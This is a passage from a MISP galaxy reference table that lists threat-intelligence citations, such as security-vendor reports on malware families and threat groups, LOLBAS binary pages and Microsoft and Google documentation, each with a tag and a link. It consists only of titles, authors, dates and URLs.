Table 13649. Table References

Links

https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

Finger.exe - LOLBAS Project

LOLBAS. (2021, August 30). Finger.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Finger.exe - LOLBAS Project"

Table 13650. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Finger/

FireEye Cyber Threats to Media Industries

FireEye. (n.d.). Retrieved April 19, 2019.

The tag is: misp-galaxy:references="FireEye Cyber Threats to Media Industries"

Table 13651. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf

FireEye DLL Side-Loading

Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="FireEye DLL Side-Loading"

Table 13652. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

FireEye Shamoon Nov 2016

FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="FireEye Shamoon Nov 2016"

Table 13653. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

FireEye Ryuk and Trickbot January 2019

Goody, K., et al. (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="FireEye Ryuk and Trickbot January 2019"

Table 13654. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

DarkReading FireEye SolarWinds

Kelly Jackson Higgins. (2021, January 7). FireEye’s Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.

The tag is: misp-galaxy:references="DarkReading FireEye SolarWinds"

Table 13655. Table References

Links

https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack

FireEye FinSpy Sept 2017

Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="FireEye FinSpy Sept 2017"

Table 13656. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

RiskIQ Cobalt Jan 2018

Klijnsma, Y. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="RiskIQ Cobalt Jan 2018"

Table 13657. Table References

Links

https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/

Chrome Extension Crypto Miner

Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Chrome Extension Crypto Miner"

Table 13658. Table References

Links

https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/

Aquasec Kubernetes Attack 2023

Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Aquasec Kubernetes Attack 2023"

Table 13659. Table References

Links

https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters

ESET-Twitoor

ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.

The tag is: misp-galaxy:references="ESET-Twitoor"

Table 13660. Table References

Links

http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/

Microsoft Azure AD Admin Consent

Baldwin, M., Flores, J., Kess, B. (2018, June 17). Five steps to securing your identity infrastructure. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Azure AD Admin Consent"

Table 13661. Table References

Links

https://docs.microsoft.com/en-us/azure/security/fundamentals/steps-secure-identity#block-end-user-consent

NTT Security Flagpro new December 2021

Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="NTT Security Flagpro new December 2021"

Table 13662. Table References

Links

https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech

Kaspersky Flame Functionality

Gostev, A. (2012, May 30). Flame: Bunny, Frog, Munch and BeetleJuice…. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Kaspersky Flame Functionality"

Table 13663. Table References

Links

https://securelist.com/flame-bunny-frog-munch-and-beetlejuice-2/32855/

Crysys Skywiper

sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="Crysys Skywiper"

Table 13664. Table References

Links

https://www.crysys.hu/publications/files/skywiper.pdf

Symantec Beetlejuice

Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.

The tag is: misp-galaxy:references="Symantec Beetlejuice"

Table 13665. Table References

Links

https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

fltMC.exe - LOLBAS Project

LOLBAS. (2021, September 18). fltMC.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="fltMC.exe - LOLBAS Project"

Table 13666. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/FltMC/

IranThreats Kittens Dec 2017

Iran Threats. (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.

The tag is: misp-galaxy:references="IranThreats Kittens Dec 2017"

Table 13667. Table References

Links

https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/

MSTIC FoggyWeb September 2021

Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="MSTIC FoggyWeb September 2021"

Table 13668. Table References

Links

https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/

Following the CloudTrail: Generating strong AWS security signals with Sumo Logic

Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Following the CloudTrail: Generating strong AWS security signals with Sumo Logic"

Table 13669. Table References

Links

https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/

Group IB RTM August 2019

Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="Group IB RTM August 2019"

Table 13670. Table References

Links

https://www.group-ib.com/blog/rtm

TrendMicro BlackTech June 2017

Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="TrendMicro BlackTech June 2017"

Table 13671. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

FireEye FIN6 April 2016

FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="FireEye FIN6 April 2016"

Table 13672. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

ESET FontOnLake Analysis 2021

Vladislav Hrčka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="ESET FontOnLake Analysis 2021"

Table 13673. Table References

Links

https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf

amnesty_nso_pegasus

Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.

The tag is: misp-galaxy:references="amnesty_nso_pegasus"

Table 13674. Table References

Links

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

Microsoft Forfiles Aug 2016

Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Microsoft Forfiles Aug 2016"

Table 13675. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

Forfiles.exe - LOLBAS Project

LOLBAS. (2018, May 25). Forfiles.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Forfiles.exe - LOLBAS Project"

Table 13676. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Forfiles/

Symantec Seaduke 2015

Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.

The tag is: misp-galaxy:references="Symantec Seaduke 2015"

Table 13677. Table References

Links

http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory

Register Uber

McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Register Uber"

Table 13678. Table References

Links

https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/

format_cmd_cisco

Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="format_cmd_cisco"

Table 13679. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668

Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation

Alexander Marvi, Brad Slaybaugh, Dan Ebreo, Tufail Ahmed, Muhammad Umair, Tina Johnson. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.

The tag is: misp-galaxy:references="Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation"

Table 13680. Table References

Links

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

Mandiant Fortinet Zero Day

Marvi, A. et al. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.

The tag is: misp-galaxy:references="Mandiant Fortinet Zero Day"

Table 13681. Table References

Links

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

macOS Foundation

Apple. (n.d.). Foundation. Retrieved July 1, 2020.

The tag is: misp-galaxy:references="macOS Foundation"

Table 13682. Table References

Links

https://developer.apple.com/documentation/foundation

SentinelOne Lazarus macOS July 2020

Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.

The tag is: misp-galaxy:references="SentinelOne Lazarus macOS July 2020"

Table 13683. Table References

Links

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

DOJ Russia Targeting Critical Infrastructure March 2022

Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.

The tag is: misp-galaxy:references="DOJ Russia Targeting Critical Infrastructure March 2022"

Table 13684. Table References

Links

https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical

ClearkSky Fox Kitten February 2020

ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="ClearkSky Fox Kitten February 2020"

Table 13685. Table References

Links

https://www.clearskysec.com/fox-kitten/

FSISAC FraudNetDoS September 2012

FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="FSISAC FraudNetDoS September 2012"

Table 13686. Table References

Links

https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf

MalwareBytes Ngrok February 2020

Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="MalwareBytes Ngrok February 2020"

Table 13687. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/

ESET ComRAT May 2020

Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="ESET ComRAT May 2020"

Table 13688. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

Azure AD to AD

Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD to AD"

Table 13689. Table References

Links

https://adsecurity.org/?p=4277

blackmatter_blackcat

Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.

The tag is: misp-galaxy:references="blackmatter_blackcat"

Table 13690. Table References

Links

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

Unit42 Malware Roundup December 29 2023

Samantha Stallings, Brad Duncan. (2023, December 29). From DarkGate to AsyncRAT: Malware Detected and Shared As Unit 42 Timely Threat Intelligence. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Unit42 Malware Roundup December 29 2023"

Table 13691. Table References

Links

https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/

Reaqta Mavinject

Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Reaqta Mavinject"

Table 13692. Table References

Links

https://reaqta.com/2017/12/mavinject-microsoft-injector/

IBM MegaCortex

Del Fierro, C., Kessem, L. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.

The tag is: misp-galaxy:references="IBM MegaCortex"

Table 13693. Table References

Links

https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/

BiZone Lizar May 2021

BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit. Retrieved February 2, 2022.

The tag is: misp-galaxy:references="BiZone Lizar May 2021"

Table 13694. Table References

Links

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

Kaspersky StoneDrill 2017

Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Kaspersky StoneDrill 2017"

Table 13695. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

FsiAnyCpu.exe - LOLBAS Project

LOLBAS. (2021, September 26). FsiAnyCpu.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="FsiAnyCpu.exe - LOLBAS Project"

Table 13696. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/

Fsi.exe - LOLBAS Project

LOLBAS. (2021, September 26). Fsi.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Fsi.exe - LOLBAS Project"

Table 13697. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/

fsutil_behavior

Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="fsutil_behavior"

Table 13698. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior

Fsutil.exe - LOLBAS Project

LOLBAS. (2021, August 16). Fsutil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Fsutil.exe - LOLBAS Project"

Table 13699. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Fsutil/

Microsoft FTP

Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022.

The tag is: misp-galaxy:references="Microsoft FTP"

Table 13700. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp

Linux FTP

N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.

The tag is: misp-galaxy:references="Linux FTP"

Table 13701. Table References

Links

https://linux.die.net/man/1/ftp

Ftp.exe - LOLBAS Project

LOLBAS. (2018, December 10). Ftp.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ftp.exe - LOLBAS Project"

Table 13702. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ftp/

Microsoft WMI Filters

Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019.

The tag is: misp-galaxy:references="Microsoft WMI Filters"

Table 13703. Table References

Links

https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/

Cybersecurity Advisory SVR TTP May 2021

NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.

The tag is: misp-galaxy:references="Cybersecurity Advisory SVR TTP May 2021"

Table 13704. Table References

Links

https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf

RiskIQ Cobalt Nov 2017

Klijnsma, Y. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="RiskIQ Cobalt Nov 2017"

Table 13705. Table References

Links

https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/

Unit 42 PingPull Jun 2022

Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.

The tag is: misp-galaxy:references="Unit 42 PingPull Jun 2022"

Table 13706. Table References

Links

https://unit42.paloaltonetworks.com/pingpull-gallium/

Microsoft GALLIUM December 2019

MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.

The tag is: misp-galaxy:references="Microsoft GALLIUM December 2019"

Table 13707. Table References

Links

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

Symantec Gallmaker Oct 2018

Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="Symantec Gallmaker Oct 2018"

Table 13708. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

TrendMicro Gamaredon April 2020

Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="TrendMicro Gamaredon April 2020"

Table 13709. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/

ESET Gamaredon June 2020

Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="ESET Gamaredon June 2020"

Table 13710. Table References

Links

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/

CERT-EE Gamaredon January 2021

CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="CERT-EE Gamaredon January 2021"

Table 13711. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf

Kaspersky Winnti June 2015

Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Kaspersky Winnti June 2015"

Table 13712. Table References

Links

https://securelist.com/games-are-over/70991/

WeLiveSecurity Gapz and Redyms Mar 2013

Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="WeLiveSecurity Gapz and Redyms Mar 2013"

Table 13713. Table References

Links

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

theevilbit gatekeeper bypass 2021

Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.

The tag is: misp-galaxy:references="theevilbit gatekeeper bypass 2021"

Table 13714. Table References

Links

https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/

Kaspersky Gauss Whitepaper

Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="Kaspersky Gauss Whitepaper"

Table 13715. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf

Kaspersky MoleRATs April 2019

GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.

The tag is: misp-galaxy:references="Kaspersky MoleRATs April 2019"

Table 13716. Table References

Links

https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

ESET Gazer Aug 2017

ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.

The tag is: misp-galaxy:references="ESET Gazer Aug 2017"

Table 13717. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

file_sig_table

Kessler, G. (2022, December 9). GCK’S FILE SIGNATURES TABLE. Retrieved August 23, 2022.

The tag is: misp-galaxy:references="file_sig_table"

Table 13718. Table References

Links

https://www.garykessler.net/library/file_sigs.html

Google Cloud Add Metadata

Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud Add Metadata"

Table 13719. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata

Google Compute Instances

Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Google Compute Instances"

Table 13720. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/compute/instances/list

GCP SSH Key Add

Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="GCP SSH Key Add"

Table 13721. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add

Google Cloud - IAM Servie Accounts List API

Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Google Cloud - IAM Servie Accounts List API"

Table 13722. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list

ESET Gelsemium June 2021

Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.

The tag is: misp-galaxy:references="ESET Gelsemium June 2021"

Table 13723. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

TechNet Scheduled Task Events

Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="TechNet Scheduled Task Events"

Table 13724. Table References

Links

https://technet.microsoft.com/library/dd315590.aspx

Ebowla: Genetic Malware

Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.

The tag is: misp-galaxy:references="Ebowla: Genetic Malware"

Table 13725. Table References

Links

https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf

Proofpoint NETWIRE December 2020

Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Proofpoint NETWIRE December 2020"

Table 13726. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/geofenced-netwire-campaigns

Hartrell cd00r 2002

Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.

The tag is: misp-galaxy:references="Hartrell cd00r 2002"

Table 13727. Table References

Links

https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

Kubectl Exec Get Shell

The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubectl Exec Get Shell"

Table 13728. Table References

Links

https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/

Microsoft getglobaladdresslist

Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft getglobaladdresslist"

Table 13729. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist

Jay GetHooks Sept 2011

Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Jay GetHooks Sept 2011"

Table 13730. Table References

Links

https://github.com/jay/gethooks

Microsoft Get-InboxRule

Microsoft. (n.d.). Get-InboxRule. Retrieved June 10, 2021.

The tag is: misp-galaxy:references="Microsoft Get-InboxRule"

Table 13731. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/get-inboxrule?view=exchange-ps

Microsoft Msolrole

Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft Msolrole"

Table 13732. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0

Microsoft msolrolemember

Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft msolrolemember"

Table 13733. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0

rowland linux at 2019

Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.

The tag is: misp-galaxy:references="rowland linux at 2019"

Table 13734. Table References

Links

https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

BlackHatRobinSage

Ryan, T. (2010). “Getting In Bed with Robin Sage.” Retrieved March 6, 2017.

The tag is: misp-galaxy:references="BlackHatRobinSage"

Table 13735. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

AADInternals Root Access to Azure VMs

Dr. Nestori Syynimaa. (2020, June 4). Getting root access to Azure VMs as a Azure AD Global Administrator. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="AADInternals Root Access to Azure VMs"

Table 13736. Table References

Links

https://aadinternals.com/post/azurevms/

Wardle Dylib Hijack Vulnerable Apps

Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Wardle Dylib Hijack Vulnerable Apps"

Table 13737. Table References

Links

https://objective-see.com/blog/blog_0x46.html

MSDN VBA in Office

Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="MSDN VBA in Office"

Table 13738. Table References

Links

https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office

Windows Getting Started Drivers

Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="Windows Getting Started Drivers"

Table 13739. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode

Bloxham

Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Bloxham"

Table 13740. Table References

Links

https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

Microsoft GetWindowLong function

Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft GetWindowLong function"

Table 13741. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx

Microsoft GFlags Mar 2017

Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft GFlags Mar 2017"

Table 13742. Table References

Links

https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview

GfxDownloadWrapper.exe - LOLBAS Project

LOLBAS. (2019, December 27). GfxDownloadWrapper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="GfxDownloadWrapper.exe - LOLBAS Project"

Table 13743. Table References

Links

https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/

GhostToken GCP flaw

Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="GhostToken GCP flaw"

Table 13744. Table References

Links

https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/

GitHub Chisel

jpillora. (n.d.). GitHub Chisel. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="GitHub Chisel"

Table 13745. Table References

Links

https://github.com/jpillora/chisel

Github evilginx2

Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Github evilginx2"

Table 13746. Table References

Links

https://github.com/kgretzky/evilginx2

GitHub evilginx2

kgretzky. (n.d.). GitHub evilginx2. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="GitHub evilginx2"

Table 13747. Table References

Links

https://github.com/kgretzky/evilginx2

GitHub Malleable C2

Mudge, R. (2014, July 14). Github Malleable-C2-Profiles safebrowsing.profile. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="GitHub Malleable C2"

Table 13748. Table References

Links

https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile

GitHub meganz MEGAsync

